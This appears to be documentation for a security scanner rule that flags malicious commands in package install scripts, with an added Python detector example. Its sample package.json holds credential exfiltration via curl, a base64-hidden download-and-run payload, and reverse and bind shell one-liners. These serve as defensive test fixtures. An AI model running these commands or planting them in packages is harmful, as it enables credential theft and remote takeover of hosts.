Malicious Installation Scripts

ID

malicious_installation_scripts

Severity

critical

Resource

Package

Tags

generic

Description

This detector checks for potentially malicious commands executed from a package's installation scripts, that is, code that runs automatically when the package is installed (for example npm lifecycle hooks such as preinstall and postinstall, or setup.py in a Python package).

Rationale

Installation scripts run automatically, usually with the privileges of the user or build system performing the install, so a malicious one poses a significant threat to the security of the host.

These scripts are meant to automate installation, but they can also download and install dependencies or external components. A malicious actor can tamper with those dependencies, or with the script itself, to include malware, so the system is infected during the installation process itself, before the package is ever imported or used.

These are the kinds of command to pay attention to:

  • Data enumeration and data exfiltration: commands that surreptitiously collect sensitive or confidential data from the compromised system (environment variables, credential files, configuration) and transmit it to an external location controlled by the attacker. This threatens the confidentiality of the data within an organization.

  • Execution policy bypass: PowerShell's execution policy is not a security boundary that restricts what a user can do. A user who cannot run a script can simply paste its contents at the command line, and a script can be started with the policy overridden (for example with powershell -ExecutionPolicy Bypass). The policy only sets basic rules and keeps users from violating them unintentionally, so malware bypasses it trivially in order to run its code.

  • External request: more generic, but still relevant. Malicious code sometimes performs a plain request from the affected system to the attacker's host just to report that the infected system is still alive, a kind of ping or beacon. Such a request also confirms to the attacker that the payload ran.

  • File download: a malware infection usually involves more than one stage or set of malicious files. A common pattern is to download further scripts or binaries from the attacker's host, either to establish persistence or to extend the malware's capabilities.

  • Reverse shell: the malware connects outbound from the infected system to the attacker and attaches a shell to that connection, giving the attacker interactive command execution with the privileges of the installing user. Because the connection is outbound, it usually passes through firewalls that block inbound connections. Once established, the attacker has full control of the affected system.

  • Reverse shell listener: the infected system starts a process that listens on a network port and hands a shell to whoever connects (for example netcat started with -l). Unlike a reverse shell, here the attacker initiates the connection, so this is also called a bind shell. The result is the same: unauthorized remote control of the affected system, and the listener can also be used to fetch and run further payloads.

  • Scheduled task: the malware creates a scheduled task on the infected system (a cron job, a systemd timer, a Windows scheduled task) to run certain actions at specified times or intervals. This gives it persistence, so it runs again every time the system boots.

This pattern is very common in malicious npm and PyPI package campaigns.

Most malicious packages in these ecosystems use the installation scripts as the injection entry point (npm lifecycle hooks such as preinstall and postinstall, or setup.py for PyPI), because the code runs as soon as the package is installed without the victim ever importing it.

Configuration

The detector has a parameter named command_kinds that configures which kinds of command the detector reports.

The available values are:

  • clipboard_leakage

  • data_exfiltration

  • defense_tool_disabled

  • decoded_code_execution

  • dependency_installation_on_runtime

  • destructive_action

  • downloaded_code_execution

  • file_download

  • file_execution

  • reverse_shell

  • reverse_shell_listener

  • sensitive_data

  • scheduled_task
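The following is an added example, not the detector's own implementation, that shows the shape of such a check: it pulls the npm lifecycle hooks out of a package.json, classifies each command into the command_kinds values listed above using one illustrative regex per kind, filters on a command_kinds parameter as described in the Configuration section, and also looks inside an `echo <base64> | base64 -d | sh` pipeline, since a payload hidden that way would otherwise be missed. The regexes, the hook list and the sample package.json are all constructed here; the IP address is from the 203.0.113.0/24 documentation range.

```python
"""Toy scanner for malicious commands in npm install hooks.

Added example; not the detector's own implementation. Each regex matches only
the plainest form of its command kind and exists to show the shape of the check.
"""
import base64
import json
import re

# npm lifecycle hooks that run automatically during `npm install`.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# One illustrative pattern per command kind. Keys reuse the command_kinds
# values from the Configuration section; the patterns themselves are assumptions.
PATTERNS = {
    "file_download": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b"),
    "downloaded_code_execution": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|zsh|python3?|node)\b"),
    "decoded_code_execution": re.compile(
        r"\bbase64\b[^|]*(-d|--decode)\b[^|]*\|\s*(sh|bash|python3?)\b"),
    # Outbound shell: the bash /dev/tcp trick, or nc/ncat with -e and without -l.
    "reverse_shell": re.compile(
        r"/dev/tcp/|\b(nc|ncat)\b(?![^;|&]*\s-l)[^;|&]*\s-e\s"),
    # Bind shell: nc/ncat listening (-l) on the infected host.
    "reverse_shell_listener": re.compile(r"\b(nc|ncat)\b[^;|&]*\s-l"),
    "scheduled_task": re.compile(r"\b(crontab|schtasks|systemd-run)\b"),
    "data_exfiltration": re.compile(
        r"\bcurl\b[^;|&]*\s(-d|--data\S*|-F|-T|--upload-file)\s"),
    "sensitive_data": re.compile(
        r"\.npmrc|\.ssh/|\.aws/|/etc/passwd|\$\{?\w*(TOKEN|SECRET|PASSWORD)"),
}

# `echo <base64> | base64 -d` pipelines hide the real command from naive greps.
B64_ECHO = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)")


def decode_embedded_base64(cmd):
    """Return the payload of an `echo <b64> | base64 -d` pipeline in cmd, or None."""
    m = B64_ECHO.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def classify_command(cmd, command_kinds=None):
    """Return the set of command kinds found in cmd, including inside any base64
    payload it decodes and executes. command_kinds limits the kinds reported,
    mirroring the detector parameter."""
    wanted = set(PATTERNS) if command_kinds is None else set(command_kinds) & set(PATTERNS)
    found = {kind for kind in wanted if PATTERNS[kind].search(cmd)}
    inner = decode_embedded_base64(cmd)
    if inner is not None:
        found |= classify_command(inner, wanted)
    return found


def extract_npm_install_commands(package_json_text):
    """Return (hook, command) pairs for the scripts npm runs during installation."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return [(hook, scripts[hook]) for hook in NPM_INSTALL_HOOKS if hook in scripts]


def scan_package(package_json_text, command_kinds=None):
    """Return findings as (hook, kind, command) tuples, one per kind detected."""
    findings = []
    for hook, cmd in extract_npm_install_commands(package_json_text):
        for kind in sorted(classify_command(cmd, command_kinds)):
            findings.append((hook, kind, cmd))
    return findings


# Constructed sample package.json; 203.0.113.0/24 is a documentation range, not a real host.
STAGE2 = "curl -s http://203.0.113.7/p.sh | sh"  # hidden inside the base64 blob below
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-pkg",
    "version": "1.0.0",
    "scripts": {
        "preinstall": "curl -X POST --data-binary @$HOME/.npmrc http://203.0.113.7/c",
        "install": "echo " + base64.b64encode(STAGE2.encode()).decode() + " | base64 -d | sh",
        "postinstall": "bash -c 'bash -i >& /dev/tcp/203.0.113.7/4444 0>&1'",
        "prepare": "node build.js",
        "test": "nc -lvp 4444 -e /bin/sh",  # not an install hook, so never scanned
    },
})

if __name__ == "__main__":
    for hook, kind, cmd in scan_package(SAMPLE_PACKAGE_JSON):
        print(f"{hook:<11} {kind:<26} {cmd}")
```

Running it flags the preinstall hook as file_download, data_exfiltration and sensitive_data, the install hook as decoded_code_execution plus the file_download and downloaded_code_execution found inside the decoded payload, and the postinstall hook as reverse_shell; the test script is ignored because npm does not run it at install time. Passing command_kinds=["reverse_shell", "reverse_shell_listener"] narrows the report to the postinstall finding only. The lookahead in the reverse_shell pattern is what keeps `nc -lvp ... -e /bin/sh` classified as a listener rather than as both kinds at once.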